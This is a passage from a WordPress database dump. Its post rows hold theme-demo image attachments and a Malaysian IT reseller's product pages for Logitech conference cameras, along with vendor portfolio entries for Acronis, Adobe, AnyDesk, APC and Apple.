11:37:51','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_6_angle.jpg',0,'attachment','image/jpeg',0),(101,2,'2013-06-07 11:38:03','2013-06-07 11:38:03','','cd_6_flat','','inherit','open','open','','cd_6_flat','','','2013-06-07 11:38:03','2013-06-07 11:38:03','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2013/06/cd_6_flat.jpg',0,'attachment','image/jpeg',0),(1238,2,'2016-02-12 08:04:46','2016-02-12 08:04:46','','logo','','inherit','open','closed','','logo','','','2016-02-12 08:04:46','2016-02-12 08:04:46','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/logo.png',0,'attachment','image/png',0),(1239,2,'2016-02-12 08:10:00','2016-02-12 08:10:00','','about1','','inherit','open','closed','','about1','','','2016-02-12 08:10:00','2016-02-12 08:10:00','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/about1.jpg',0,'attachment','image/jpeg',0),(1240,2,'2016-02-12 08:10:06','2016-02-12 08:10:06','','about2','','inherit','open','closed','','about2','','','2016-02-12 08:10:06','2016-02-12 08:10:06','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/about2.jpg',0,'attachment','image/jpeg',0),(1241,2,'2016-02-12 08:10:09','2016-02-12 08:10:09','','about3','','inherit','open','closed','','about3','','','2016-02-12 08:10:09','2016-02-12 08:10:09','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/about3.jpg',0,'attachment','image/jpeg',0),(34,2,'2016-02-12 08:24:42','2016-02-12 08:24:42','','blog2','','inherit','open','closed','','blog2','','','2016-02-12 08:24:42','2016-02-12 08:24:42','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/blog2.jpg',0,'attachment','image/jpeg',0),(35,2,'2016-02-12 08:26:25','2016-02-12 08:26:25','','blog4','','inherit','open','closed','','blog4','','','2016-02-12 08:26:25','2016-02-12 08:26:25','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/blog4.jpg',0,'attachment','image/jpeg',0),(36,2,'2016-02-12 08:26:28','2016-02-12 08:26:28','','blog1','','inherit','open','closed','','blog1','','','2016-02-12 08:26:28','2016-02-12 08:26:28','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/blog1.jpg',0,'attachment','image/jpeg',0),(1179,2,'2016-02-12 09:04:43','2016-02-12 09:04:43','','Typing','','inherit','open','closed','','typing','','','2016-02-12 09:04:43','2016-02-12 09:04:43','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/Typing.mp4',0,'attachment','video/mp4',0),(1180,2,'2016-02-12 09:05:04','2016-02-12 09:05:04','','Typing','','inherit','open','closed','','typing-2','','','2016-02-12 09:05:04','2016-02-12 09:05:04','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/Typing.webm',0,'attachment','video/webm',0),(1189,2,'2016-02-12 10:15:03','2016-02-12 10:15:03','','hero_plus','','inherit','open','closed','','hero_plus','','','2016-02-12 10:15:03','2016-02-12 10:15:03','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/hero_plus.jpg',0,'attachment','image/jpeg',0),(1190,2,'2016-02-12 10:18:17','2016-02-12 10:18:17','','hero_plus2','','inherit','open','closed','','hero_plus2','','','2016-02-12 10:18:17','2016-02-12 10:18:17','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/hero_plus2.jpg',0,'attachment','image/jpeg',0),(1191,2,'2016-02-12 11:15:51','2016-02-12 11:15:51','','project6','','inherit','open','closed','','project6','','','2016-02-12 11:15:51','2016-02-12 11:15:51','',0,'http://demos.famethemes.com/onepress-plus/wp-content/uploads/sites/18/2016/02/project6.jpg',0,'attachment','image/jpeg',0),(1242,1,'2018-12-11 01:29:52','2018-12-11 01:29:52','','conferencecam-group','','inherit','open','closed','','conferencecam-group','','','2018-12-11 01:29:52','2018-12-11 01:29:52','',16,'https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png',0,'attachment','image/png',0),(1243,1,'2018-12-11 01:30:23','2018-12-11 01:30:23','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">GROUP</h1>\r\n<h1><img class=\"alignnone size-full wp-image-1242\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" width=\"687\" height=\"600\" /></h1>\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n</div>','Logitech Group','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 01:30:23','2018-12-11 01:30:23','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1324,1,'2018-12-11 11:54:41','2018-12-11 03:54:41','Backup software, disaster recovery, and secure data access. <a href=\"http://bintara.com.my/acronis\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1768\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acronis-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','ACRONIS','','publish','closed','closed','','acronis','','','2019-01-02 16:14:02','2019-01-02 08:14:02','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1324',0,'portfolio','',0),(1639,1,'2018-12-11 16:07:28','2018-12-11 08:07:28','','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2018-12-11 16:07:28','2018-12-11 08:07:28','',1634,'https://bintara.com.my/blog/2018/12/11/1634-revision-v1/',0,'revision','',0),(1325,1,'2018-12-11 11:55:36','2018-12-11 03:55:36','Image editing software, Acrobat Reader. <a href=\"http://bintara.com.my/adobe\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','ADOBE','','publish','closed','closed','','adobe','','','2019-01-02 16:14:14','2019-01-02 08:14:14','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1325',0,'portfolio','',0),(1327,1,'2018-12-11 11:59:37','2018-12-11 03:59:37','','smartdock','','inherit','closed','closed','','smartdock','','','2018-12-11 11:59:37','2018-12-11 03:59:37','',16,'https://bintara.com.my/wp-content/uploads/2018/12/smartdock.png',0,'attachment','image/png',0),(1328,1,'2018-12-11 12:03:10','2018-12-11 04:03:10','Remote Desktop Application. <a href=\"http://bintara.com.my/anydesk\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1813\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-131x.png\" alt=\"\" width=\"1024\" height=\"681\" />','ANYDESK','','publish','closed','closed','','anydesk','','','2019-09-23 16:25:30','2019-09-23 08:25:30','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1328',0,'portfolio','',0),(1329,1,'2018-12-11 12:04:04','2018-12-11 04:04:04','Uninterruptible Power Supply (UPS). <a href=\"http://bintara.com.my/apc\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1668\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','APC','','publish','closed','closed','','apc','','','2019-01-02 16:14:34','2019-01-02 08:14:34','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1329',0,'portfolio','',0),(1638,1,'2018-12-11 16:07:02','2018-12-11 08:07:02','','GoToWebinar','','inherit','closed','closed','','1633-revision-v1','','','2018-12-11 16:07:02','2018-12-11 08:07:02','',1633,'https://bintara.com.my/blog/2018/12/11/1633-revision-v1/',0,'revision','',0),(1332,1,'2018-12-11 12:05:34','2018-12-11 04:05:34','','briopictograms','','inherit','closed','closed','','briopictograms','','','2018-12-11 12:05:34','2018-12-11 04:05:34','',16,'https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png',0,'attachment','image/png',0),(1333,1,'2018-12-11 12:07:43','2018-12-11 04:07:43','iPad Pro, MacBook Pro, iMac Pro. <a href=\"https://bintara.com.my/apple/\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1814\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Apple-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','APPLE','','publish','closed','closed','','apple','','','2019-01-02 16:19:13','2019-01-02 08:19:13','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1333',0,'portfolio','',0),(1637,1,'2018-12-11 16:06:55','2018-12-11 08:06:55','','GoToMeeting','','inherit','closed','closed','','1632-revision-v1','','','2018-12-11 16:06:55','2018-12-11 08:06:55','',1632,'https://bintara.com.my/blog/2018/12/11/1632-revision-v1/',0,'revision','',0),(1245,1,'2018-12-11 01:37:24','2018-12-11 01:37:24','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">GROUP</h1>\r\n<h1><img class=\"alignnone size-full wp-image-1242\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" width=\"687\" height=\"600\" /></h1>\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\nDIMENSIONS\r\n\r\n<strong>Camera:</strong>\r\n\r\nHeight x Width x Depth: 5.12 in (130 mm) x 7.0 in (170 mm) x 5.40 in (138 mm)\r\n\r\nWeight: 1.31lb (585 g)\r\n\r\n<strong>Speakerphone:</strong>\r\n\r\nHeight x Width x Depth: 9.5 in (240 mm ) xÂ  2.5 in (65 mm ) x 9.5 in (240 mm )\r\n\r\nWeight: 2.68 lb (1223 g)\r\n\r\n<strong>Hub:</strong>\r\n\r\nHeight x Width x Depth: 3.75 in (94 mm) x 1.3 in (34 mm) x 2.9 in (74 mm)\r\n\r\nWeight: 3.0 oz (83 g)\r\n\r\n<strong>Remote:</strong>\r\n\r\nHeight x Width x Depth: 2.0 in (50 mm) x 5.0 in(120 mm) x 0.5 in (12 mm)\r\n\r\nWeight: 2.0 ozÂ  (51 g)\r\n\r\n<strong>Wall/Table Mount:</strong>\r\n\r\nHeight x Width x Depth: 8.27 in (210 mm) x 4.72 in (120 mm) x 3.9 in (99 mm)\r\n\r\nWeight: 8.99 oz (255 g)\r\n\r\n<strong>Expansion Mics (Optional):</strong>\r\n\r\nHeight x Width x Depth: 3.30 in (83 mm) x 3.30 in (83 mm) x 0.83 in (21 mm)\r\n\r\nWeight: 8.0 oz 230 g)\r\n\r\n&nbsp;\r\n\r\nSYSTEM REQUIREMENTS\r\n<ul>\r\n 	<li>WindowsÂ® 7, 8.1 or 10</li>\r\n 	<li>macOS 10.10 or higher</li>\r\n</ul>\r\n&nbsp;\r\n\r\nTECHNICAL SPECIFICATIONS\r\n\r\n&nbsp;\r\n\r\nCAMERA\r\n<ul>\r\n 	<li>Smooth motorized pan, tilt and zoom controlled from remote or console</li>\r\n 	<li>260Â° pan</li>\r\n 	<li>130Â° tilt</li>\r\n 	<li>10x lossless HD zoom</li>\r\n 	<li>90Â° field of view</li>\r\n 	<li>Full HD 1080p 30fps</li>\r\n 	<li>264 UVC 1.5 with Scalable Video Coding (SVC)</li>\r\n 	<li>Autofocus</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Far-end control (PTZ) of ConferenceCam product (with supported services)</li>\r\n 	<li>Kensington security slot</li>\r\n 	<li>Video mute/unmute LED indicator</li>\r\n 	<li>Standard tripod thread</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>REMOTE CONTROL</strong>\r\n<ul>\r\n 	<li>Camera, speakerphone, and call control</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Docks on speakerphone</li>\r\n 	<li>IR 8.5 m/28-foot range</li>\r\n 	<li>CR2032 battery (included)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>SPEAKERPHONE</strong>\r\n<ul>\r\n 	<li>Full-duplex performance</li>\r\n 	<li>Acoustic echo cancellation</li>\r\n 	<li>Noise reduction technology</li>\r\n 	<li>Ultra-wideband audio</li>\r\n 	<li>Pairs with mobile devices via Bluetooth and NFC</li>\r\n 	<li>LCD for caller ID, call duration and other functional response</li>\r\n 	<li>LEDs for speakerphone streaming, mute, hold, and Bluetooth</li>\r\n 	<li>Tactile buttons for call answer/end, volume and mute, Bluetooth, and camera controls</li>\r\n 	<li>5 camera presets for pan, tilt, and zoom settings</li>\r\n 	<li>Kensington security slot</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>MICROPHONES</strong>\r\n<ul>\r\n 	<li>Pickup range: 6m / 20 ft</li>\r\n 	<li>Pickup range with expansion mics: 8.5 m / 28 ft</li>\r\n 	<li>Four omnidirectional, beamforming microphones</li>\r\n 	<li>Frequency response: 100Hz â€“ 11KHz</li>\r\n 	<li>Sensitivity: -28dB +/-3dB</li>\r\n 	<li>Distortion: &lt;5% from 200Hz</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>HUB / CABLES / POWER</strong>\r\n<ul>\r\n 	<li>Central Hub connects and powers all components</li>\r\n 	<li>Under-table mounting adhesive included</li>\r\n 	<li>One cable to camera: 5 m / 16 ft</li>\r\n 	<li>One cable to speakerphone: 5 m /16 ft</li>\r\n 	<li>Extended cables available (10 m and 15 m)</li>\r\n 	<li>One USB cable for connection to PC/Mac (2 m / 6.6 ft)</li>\r\n 	<li>AC Power adapter with regional plugs</li>\r\n 	<li>Power cable (3 m / 9.8 ft)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>MOUNT</strong>\r\n\r\nDual-purpose bracket works for both wall mounting and tabletop elevation\r\n\r\n&nbsp;\r\n\r\n<strong>COMPATIBILITY AND INTEGRATIONS</strong>\r\n<ul>\r\n 	<li>Plug-and-play USB connectivity</li>\r\n 	<li>Works with most any video conferencing application or meetings service</li>\r\n 	<li>Skype for Business certified</li>\r\n 	<li>Microsoft CortanaÂ® certified</li>\r\n 	<li>Cisco JabberÂ® and WebEx compatible</li>\r\n 	<li>Enhanced integration with Logitech Collaboration Program (LCP) members, including BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom</li>\r\n</ul>\r\n&nbsp;\r\n\r\nPACKAGE CONTENTS\r\n<ul>\r\n 	<li>Camera</li>\r\n 	<li>Speakerphone</li>\r\n 	<li>Remote control</li>\r\n 	<li>Two 5m / 16.4 ft cables for connection between speakerphone and hub and camera and hub</li>\r\n 	<li>One 2m / 6.6 ft meter cable between hub and PC</li>\r\n 	<li>Velcro for cable management</li>\r\n 	<li>Velcro for hub to table securing</li>\r\n 	<li>Powered hub</li>\r\n 	<li>Power adapter with regional plugs and 3m / 9.8 ft cable</li>\r\n 	<li>Mount</li>\r\n 	<li>Documentation</li>\r\n 	<li>Warranty card</li>\r\n</ul>\r\n&nbsp;\r\n\r\nWARRANTY INFORMATION\r\n\r\n2-Year Limited Hardware Warranty\r\n\r\n</div>','Logitech Group','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 01:37:24','2018-12-11 01:37:24','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1358,1,'2018-12-11 12:23:40','2018-12-11 04:23:40','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2>CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"alignnone wp-image-1327 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong><span class=\"product-name\">SMARTDOCK</span></strong>\r\n<h2>WEBCAMS</h2>\r\n<p class=\"lead\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong></td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech B525</strong></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[maxbutton id=\"1\"]\r\n\r\n</div>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 12:23:40','2018-12-11 04:23:40','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1246,1,'2018-12-11 01:39:17','2018-12-11 01:39:17','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">GROUP</h1>\r\n<h1><img class=\"alignnone size-full wp-image-1242\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" width=\"687\" height=\"600\" /></h1>\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n<strong>DIMENSIONS</strong>\r\n\r\n<strong>Camera:</strong>\r\n\r\nHeight x Width x Depth: 5.12 in (130 mm) x 7.0 in (170 mm) x 5.40 in (138 mm)\r\n\r\nWeight: 1.31lb (585 g)\r\n\r\n<strong>Speakerphone:</strong>\r\n\r\nHeight x Width x Depth: 9.5 in (240 mm ) xÂ  2.5 in (65 mm ) x 9.5 in (240 mm )\r\n\r\nWeight: 2.68 lb (1223 g)\r\n\r\n<strong>Hub:</strong>\r\n\r\nHeight x Width x Depth: 3.75 in (94 mm) x 1.3 in (34 mm) x 2.9 in (74 mm)\r\n\r\nWeight: 3.0 oz (83 g)\r\n\r\n<strong>Remote:</strong>\r\n\r\nHeight x Width x Depth: 2.0 in (50 mm) x 5.0 in(120 mm) x 0.5 in (12 mm)\r\n\r\nWeight: 2.0 ozÂ  (51 g)\r\n\r\n<strong>Wall/Table Mount:</strong>\r\n\r\nHeight x Width x Depth: 8.27 in (210 mm) x 4.72 in (120 mm) x 3.9 in (99 mm)\r\n\r\nWeight: 8.99 oz (255 g)\r\n\r\n<strong>Expansion Mics (Optional):</strong>\r\n\r\nHeight x Width x Depth: 3.30 in (83 mm) x 3.30 in (83 mm) x 0.83 in (21 mm)\r\n\r\nWeight: 8.0 oz 230 g)\r\n\r\n&nbsp;\r\n\r\n<strong>SYSTEM REQUIREMENTS</strong>\r\n<ul>\r\n 	<li>WindowsÂ® 7, 8.1 or 10</li>\r\n 	<li>macOS 10.10 or higher</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>TECHNICAL SPECIFICATIONS</strong>\r\n\r\n<strong>CAMERA</strong>\r\n<ul>\r\n 	<li>Smooth motorized pan, tilt and zoom controlled from remote or console</li>\r\n 	<li>260Â° pan</li>\r\n 	<li>130Â° tilt</li>\r\n 	<li>10x lossless HD zoom</li>\r\n 	<li>90Â° field of view</li>\r\n 	<li>Full HD 1080p 30fps</li>\r\n 	<li>264 UVC 1.5 with Scalable Video Coding (SVC)</li>\r\n 	<li>Autofocus</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Far-end control (PTZ) of ConferenceCam product (with supported services)</li>\r\n 	<li>Kensington security slot</li>\r\n 	<li>Video mute/unmute LED indicator</li>\r\n 	<li>Standard tripod thread</li>\r\n</ul>\r\n<strong>REMOTE CONTROL</strong>\r\n<ul>\r\n 	<li>Camera, speakerphone, and call control</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Docks on speakerphone</li>\r\n 	<li>IR 8.5 m/28-foot range</li>\r\n 	<li>CR2032 battery (included)</li>\r\n</ul>\r\n<strong>SPEAKERPHONE</strong>\r\n<ul>\r\n 	<li>Full-duplex performance</li>\r\n 	<li>Acoustic echo cancellation</li>\r\n 	<li>Noise reduction technology</li>\r\n 	<li>Ultra-wideband audio</li>\r\n 	<li>Pairs with mobile devices via Bluetooth and NFC</li>\r\n 	<li>LCD for caller ID, call duration and other functional response</li>\r\n 	<li>LEDs for speakerphone streaming, mute, hold, and Bluetooth</li>\r\n 	<li>Tactile buttons for call answer/end, volume and mute, Bluetooth, and camera controls</li>\r\n 	<li>5 camera presets for pan, tilt, and zoom settings</li>\r\n 	<li>Kensington security slot</li>\r\n</ul>\r\n<strong>MICROPHONES</strong>\r\n<ul>\r\n 	<li>Pickup range: 6m / 20 ft</li>\r\n 	<li>Pickup range with expansion mics: 8.5 m / 28 ft</li>\r\n 	<li>Four omnidirectional, beamforming microphones</li>\r\n 	<li>Frequency response: 100Hz â€“ 11KHz</li>\r\n 	<li>Sensitivity: -28dB +/-3dB</li>\r\n 	<li>Distortion: &lt;5% from 200Hz</li>\r\n</ul>\r\n<strong>HUB / CABLES / POWER</strong>\r\n<ul>\r\n 	<li>Central Hub connects and powers all components</li>\r\n 	<li>Under-table mounting adhesive included</li>\r\n 	<li>One cable to camera: 5 m / 16 ft</li>\r\n 	<li>One cable to speakerphone: 5 m /16 ft</li>\r\n 	<li>Extended cables available (10 m and 15 m)</li>\r\n 	<li>One USB cable for connection to PC/Mac (2 m / 6.6 ft)</li>\r\n 	<li>AC Power adapter with regional plugs</li>\r\n 	<li>Power cable (3 m / 9.8 ft)</li>\r\n</ul>\r\n<strong>MOUNT</strong>\r\n\r\nDual-purpose bracket works for both wall mounting and tabletop elevation\r\n\r\n<strong>COMPATIBILITY AND INTEGRATIONS</strong>\r\n<ul>\r\n 	<li>Plug-and-play USB connectivity</li>\r\n 	<li>Works with most any video conferencing application or meetings service</li>\r\n 	<li>Skype for Business certified</li>\r\n 	<li>Microsoft CortanaÂ® certified</li>\r\n 	<li>Cisco JabberÂ® and WebEx compatible</li>\r\n 	<li>Enhanced integration with Logitech Collaboration Program (LCP) members, including BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom</li>\r\n</ul>\r\n<strong>PACKAGE CONTENTS</strong>\r\n<ul>\r\n 	<li>Camera</li>\r\n 	<li>Speakerphone</li>\r\n 	<li>Remote control</li>\r\n 	<li>Two 5m / 16.4 ft cables for connection between speakerphone and hub and camera and hub</li>\r\n 	<li>One 2m / 6.6 ft meter cable between hub and PC</li>\r\n 	<li>Velcro for cable management</li>\r\n 	<li>Velcro for hub to table securing</li>\r\n 	<li>Powered hub</li>\r\n 	<li>Power adapter with regional plugs and 3m / 9.8 ft cable</li>\r\n 	<li>Mount</li>\r\n 	<li>Documentation</li>\r\n 	<li>Warranty card</li>\r\n</ul>\r\n<strong>WARRANTY INFORMATION</strong>\r\n\r\n2-Year Limited Hardware Warranty\r\n\r\n</div>','Logitech Group','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 01:39:17','2018-12-11 01:39:17','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(2985,1,'2019-03-04 15:00:24','2019-03-04 07:00:24','<h3>Rally Camera</h3>\r\nPremium PTZ camera with Ultra-HD imaging system and automatic camera control.\r\n<ul>\r\n 	<li>RightSenseâ„¢ technology automates a better user experience</li>\r\n 	<li>Advanced optics frame every participant with amazing clarity</li>\r\n 	<li>Sleek industrial design for any professional meeting space</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" alt=\"\" width=\"300\" height=\"262\" />\r\n<h3>Peerless Performance. Exceptional Versatility.</h3>\r\nWith premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from LogitechÂ®. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan/Tilt/Zoom, razor-sharp 15X HD zoom, expansive 90Â° field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.\r\n\r\nhttps://youtu.be/TWRoAslIm0c\r\n<h3>STUDIO-QUALITY VIDEO</h3>\r\nWith an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢ technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.\r\n<h3>SLEEK INDUSTRIAL DESIGN</h3>\r\nRally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when itâ€™s inverted and automatically corrects image orientation and camera controls.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>SEE EVERYONE, PERFECTLY FRAMED</h3>\r\nLogitech RightSightâ„¢ camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.\r\n\r\nFuture Availability: RightSight will be enabled by a software download, with initial support for Windows 10.\r\n\r\nhttps://youtu.be/-xGIqpPOyXs\r\n<h3>ENHANCED USER EXPERIENCE</h3>\r\nLogitech RightSenseâ„¢ is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSightâ„¢ automates camera control to perfectly frame participants, no matter their distance from the lens. RightLightâ„¢ optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.\r\n<h3>PRIVACY ASSURANCE</h3>\r\nWhen Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to â€œseeâ€ anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.\r\n\r\n<img 